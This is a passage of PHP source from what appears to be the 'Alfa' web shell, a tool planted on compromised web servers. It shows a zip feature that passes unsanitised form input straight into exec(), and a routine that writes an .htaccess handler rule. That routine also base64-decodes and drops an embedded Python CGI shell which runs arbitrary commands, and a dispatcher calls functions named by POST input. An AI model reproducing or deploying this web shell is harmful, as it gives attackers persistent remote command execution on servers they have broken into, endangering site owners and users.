3296. Save Dir: <input type="text" name="zipfile" value="alfa.zip" size="60"/><br /><br />
3297. <input type="submit" value=">>" name="ziper" /> <br /><br />
3298. </form></center>
3299. ';
3300. if(isset($_POST['alfa5']) && ($_POST['alfa5'] == '>>'))
3301. {
3302. $dirzip = trim($_POST['alfa3']);
3303. $zipfile = trim($_POST['alfa4']);
3304. if(exec("zip -r $zipfile $dirzip")){
3305. echo '<pre id="strOutput" style="margin-top:8px" class="ml1"><br/><center><b><center><b><b><font color="#FFFF01">==</font> <font color="#00A220">File or</font> <font color="#FFFFFF">Directory</font> <font color="#FF0000">Ziped</font><font color="#FFFF01"> ==</font></b>
3306. </b></center></b></center><br><br>';
3307. }else {echo '<pre id="strOutput" style="margin-top:8px" class="ml1"><br/><center><b>ERROR!!!...</b><center><br><br>';}
3308. }
3309. }
3310. echo '</div>';
3311. alfafooter();
3312. }
3313. function alfacgipython()
3314. {
3315. alfahead();
3316. echo '<div class=header>';
3317. mkdir('cgipy',0755);
3318. chdir('cgipy');
3319. $solevisible7 = '.htaccess';
3320. $solevisible6 = "$solevisible7";
3321. $solevisible4 = fopen ($solevisible6 ,'w') or die ('ERROR!!!');
3322. $solevisible5 = 'AddHandler cgi-script .izo';
3323. fwrite ( $solevisible4 ,$solevisible5 ) ;
3324. fclose ($solevisible4);
3325. $solevisible3 = 'IyEvdXNyL2Jpbi9weXRob24KIyAwNy0wNy0wNAojIHYxLjAuMAoKIyBjZ2ktc2hlbGwucHkKIyBB
3326. IHNpbXBsZSBDR0kgdGhhdCBleGVjdXRlcyBhcmJpdHJhcnkgc2hlbGwgY29tbWFuZHMuCgoKIyBD
3327. b3B5cmlnaHQgTWljaGFlbCBGb29yZAojIFlvdSBhcmUgZnJlZSB0byBtb2RpZnksIHVzZSBhbmQg
3328. cmVsaWNlbnNlIHRoaXMgY29kZS4KCiMgTm8gd2FycmFudHkgZXhwcmVzcyBvciBpbXBsaWVkIGZv
3329. ciB0aGUgYWNjdXJhY3ksIGZpdG5lc3MgdG8gcHVycG9zZSBvciBvdGhlcndpc2UgZm9yIHRoaXMg
3330. Y29kZS4uLi4KIyBVc2UgYXQgeW91ciBvd24gcmlzayAhISEKCiMgRS1tYWlsIG1pY2hhZWwgQVQg
3331. Zm9vcmQgRE9UIG1lIERPVCB1awojIE1haW50YWluZWQgYXQgd3d3LnZvaWRzcGFjZS5vcmcudWsv
3332. YXRsYW50aWJvdHMvcHl0aG9udXRpbHMuaHRtbAoKIiIiCkEgc2ltcGxlIENHSSBzY3JpcHQgdG8g
3333. ZXhlY3V0ZSBzaGVsbCBjb21tYW5kcyB2aWEgQ0dJLgoiIiIKIyMjIyMjIyMjIyMjIyMjIyMjIyMj
3334. IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIwojIEltcG9ydHMKdHJ5
3335. OgogICAgaW1wb3J0IGNnaXRiOyBjZ2l0Yi5lbmFibGUoKQpleGNlcHQ6CiAgICBwYXNzCmltcG9y
3336. dCBzeXMsIGNnaSwgb3MKc3lzLnN0ZGVyciA9IHN5cy5zdGRvdXQKZnJvbSB0aW1lIGltcG9ydCBz
3337. dHJmdGltZQppbXBvcnQgdHJhY2ViYWNrCmZyb20gU3RyaW5nSU8gaW1wb3J0IFN0cmluZ0lPCmZy
3338. b20gdHJhY2ViYWNrIGltcG9ydCBwcmludF9leGMKCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj
3339. IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMKIyBjb25zdGFudHMKCmZvbnRs
3340. aW5lID0gJzxGT05UIENPTE9SPSM0MjQyNDIgc3R5bGU9ImZvbnQtZmFtaWx5OnRpbWVzO2ZvbnQt
3341. c2l6ZToxMnB0OyI+Jwp2ZXJzaW9uc3RyaW5nID0gJ1ZlcnNpb24gMS4wLjAgN3RoIEp1bHkgMjAw
3342. NCcKCmlmIG9zLmVudmlyb24uaGFzX2tleSgiU0NSSVBUX05BTUUiKToKICAgIHNjcmlwdG5hbWUg
3343. PSBvcy5lbnZpcm9uWyJTQ1JJUFRfTkFNRSJdCmVsc2U6CiAgICBzY3JpcHRuYW1lID0gIiIKCk1F
3344. VEhPRCA9ICciUE9TVCInCgojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj
3345. IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjCiMgUHJpdmF0ZSBmdW5jdGlvbnMgYW5kIHZhcmlhYmxl
3346. cwoKZGVmIGdldGZvcm0odmFsdWVsaXN0LCB0aGVmb3JtLCBub3RwcmVzZW50PScnKToKICAgICIi
3347. IlRoaXMgZnVuY3Rpb24sIGdpdmVuIGEgQ0dJIGZvcm0sIGV4dHJhY3RzIHRoZSBkYXRhIGZyb20g
3348. aXQsIGJhc2VkIG9uCiAgICB2YWx1ZWxpc3QgcGFzc2VkIGluLiBBbnkgbm9uLXByZXNlbnQgdmFs
3349. dWVzIGFyZSBzZXQgdG8gJycgLSBhbHRob3VnaCB0aGlzIGNhbiBiZSBjaGFuZ2VkLgogICAgKGUu
3350. Zy4gdG8gcmV0dXJuIE5vbmUgc28geW91IGNhbiB0ZXN0IGZvciBtaXNzaW5nIGtleXdvcmRzIC0g
3351. d2hlcmUgJycgaXMgYSB2YWxpZCBhbnN3ZXIgYnV0IHRvIGhhdmUgdGhlIGZpZWxkIG1pc3Npbmcg
3352. aXNuJ3QuKSIiIgogICAgZGF0YSA9IHt9CiAgICBmb3IgZmllbGQgaW4gdmFsdWVsaXN0OgogICAg
3353. ICAgIGlmIG5vdCB0aGVmb3JtLmhhc19rZXkoZmllbGQpOgogICAgICAgICAgICBkYXRhW2ZpZWxk
3354. XSA9IG5vdHByZXNlbnQKICAgICAgICBlbHNlOgogICAgICAgICAgICBpZiAgdHlwZSh0aGVmb3Jt
3355. W2ZpZWxkXSkgIT0gdHlwZShbXSk6CiAgICAgICAgICAgICAgICBkYXRhW2ZpZWxkXSA9IHRoZWZv
3356. cm1bZmllbGRdLnZhbHVlCiAgICAgICAgICAgIGVsc2U6CiAgICAgICAgICAgICAgICB2YWx1ZXMg
3357. PSBtYXAobGFtYmRhIHg6IHgudmFsdWUsIHRoZWZvcm1bZmllbGRdKSAgICAgIyBhbGxvd3MgZm9y
3358. IGxpc3QgdHlwZSB2YWx1ZXMKICAgICAgICAgICAgICAgIGRhdGFbZmllbGRdID0gdmFsdWVzCiAg
3359. ICByZXR1cm4gZGF0YQoKCnRoZWZvcm1oZWFkID0gIiIiPEhUTUw+PEhFQUQ+PFRJVExFPmNnaS1z
3360. aGVsbC5weSAtIGEgQ0dJIGJ5IEZ1enp5bWFuPC9USVRMRT48L0hFQUQ+CjxCT0RZPjxDRU5URVI+
3361. CjxIMT5XZWxjb21lIHRvIGNnaS1zaGVsbC5weSAtIDxCUj5hIFB5dGhvbiBDR0k8L0gxPgo8Qj48
3362. ST5CeSBGdXp6eW1hbjwvQj48L0k+PEJSPgoiIiIrZm9udGxpbmUgKyJWZXJzaW9uIDogIiArIHZl
3363. cnNpb25zdHJpbmcgKyAiIiIsIFJ1bm5pbmcgb24gOiAiIiIgKyBzdHJmdGltZSgnJUk6JU0gJXAs
3364. ICVBICVkICVCLCAlWScpKycuPC9DRU5URVI+PEJSPicKCnRoZWZvcm0gPSAiIiI8SDI+RW50ZXIg
3365. Q29tbWFuZDwvSDI+CjxGT1JNIE1FVEhPRD1cIiIiIiArIE1FVEhPRCArICciIGFjdGlvbj0iJyAr
3366. IHNjcmlwdG5hbWUgKyAiIiJcIj4KPGlucHV0IG5hbWU9Y21kIHR5cGU9dGV4dD48QlI+CjxpbnB1
3367. dCB0eXBlPXN1Ym1pdCB2YWx1ZT0iU3VibWl0Ij48QlI+CjwvRk9STT48QlI+PEJSPiIiIgpib2R5
3368. ZW5kID0gJzwvQk9EWT48L0hUTUw+JwplcnJvcm1lc3MgPSAnPENFTlRFUj48SDI+U29tZXRoaW5n
3369. IFdlbnQgV3Jvbmc8L0gyPjxCUj48UFJFPicKCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj
3370. IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMKIyBtYWluIGJvZHkgb2YgdGhlIHNj
3371. cmlwdAoKaWYgX19uYW1lX18gPT0gJ19fbWFpbl9fJzoKICAgIHByaW50ICJDb250ZW50LXR5cGU6
3372. IHRleHQvaHRtbCIgICAgICAgICAjIHRoaXMgaXMgdGhlIGhlYWRlciB0byB0aGUgc2VydmVyCiAg
3373. ICBwcmludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIyBzbyBpcyB0aGlzIGJs
3374. YW5rIGxpbmUKICAgIGZvcm0gPSBjZ2kuRmllbGRTdG9yYWdlKCkKICAgIGRhdGEgPSBnZXRmb3Jt
3375. KFsnY21kJ10sZm9ybSkKICAgIHRoZWNtZCA9IGRhdGFbJ2NtZCddCiAgICBwcmludCB0aGVmb3Jt
3376. aGVhZAogICAgcHJpbnQgdGhlZm9ybQogICAgaWYgdGhlY21kOgogICAgICAgIHByaW50ICc8SFI+
3377. PEJSPjxCUj4nCiAgICAgICAgcHJpbnQgJzxCPkNvbW1hbmQgOiAnLCB0aGVjbWQsICc8QlI+PEJS
3378. PicKICAgICAgICBwcmludCAnUmVzdWx0IDogPEJSPjxCUj4nCiAgICAgICAgdHJ5OgogICAgICAg
3379. ICAgICBjaGlsZF9zdGRpbiwgY2hpbGRfc3Rkb3V0ID0gb3MucG9wZW4yKHRoZWNtZCkKICAgICAg
3380. ICAgICAgY2hpbGRfc3RkaW4uY2xvc2UoKQogICAgICAgICAgICByZXN1bHQgPSBjaGlsZF9zdGRv
3381. dXQucmVhZCgpCiAgICAgICAgICAgIGNoaWxkX3N0ZG91dC5jbG9zZSgpCiAgICAgICAgICAgIHBy
3382. aW50IHJlc3VsdC5yZXBsYWNlKCdcbicsICc8QlI+JykKCiAgICAgICAgZXhjZXB0IEV4Y2VwdGlv
3383. biwgZTogICAgICAgICAgICAgICAgICAgICAgIyBhbiBlcnJvciBpbiBleGVjdXRpbmcgdGhlIGNv
3384. bW1hbmQKICAgICAgICAgICAgcHJpbnQgZXJyb3JtZXNzCiAgICAgICAgICAgIGYgPSBTdHJpbmdJ
3385. TygpCiAgICAgICAgICAgIHByaW50X2V4YyhmaWxlPWYpCiAgICAgICAgICAgIGEgPSBmLmdldHZh
3386. bHVlKCkuc3BsaXRsaW5lcygpCiAgICAgICAgICAgIGZvciBsaW5lIGluIGE6CiAgICAgICAgICAg
3387. ICAgICBwcmludCBsaW5lCgogICAgcHJpbnQgYm9keWVuZAoKCiIiIgpUT0RPL0lTU1VFUwoKCgpD
3388. SEFOR0VMT0cKCjA3LTA3LTA0ICAgICAgICBWZXJzaW9uIDEuMC4wCkEgdmVyeSBiYXNpYyBzeXN0
3389. ZW0gZm9yIGV4ZWN1dGluZyBzaGVsbCBjb21tYW5kcy4KSSBtYXkgZXhwYW5kIGl0IGludG8gYSBw
3390. cm9wZXIgJ2Vudmlyb25tZW50JyB3aXRoIHNlc3Npb24gcGVyc2lzdGVuY2UuLi4KIiIi';
3391. $solevisible1 = fopen('py.izo','w+');
3392. $solevisible2 = fwrite ($solevisible1 ,base64_decode($solevisible3));
3393. fclose($solevisible1);
3394. chmod('py.izo',0755);
3395. echo '<iframe src=cgipy/py.izo width=100% height=600px frameborder=0></iframe> ';
3396. echo "</div>";
3397. alfafooter();
3398. }
3399. if( empty($_POST['a']) )
3400. if(isset($default_action) && function_exists('alfa' . $default_action))
3401. $_POST['a'] = $default_action;
3402. else
3403. $_POST['a'] = 'FilesMan';
3404. if( !empty($_POST['a']) && function_exists('alfa' . $_POST['a']) )
3405. call_user_func('alfa' . $_POST['a']);
3406. exit;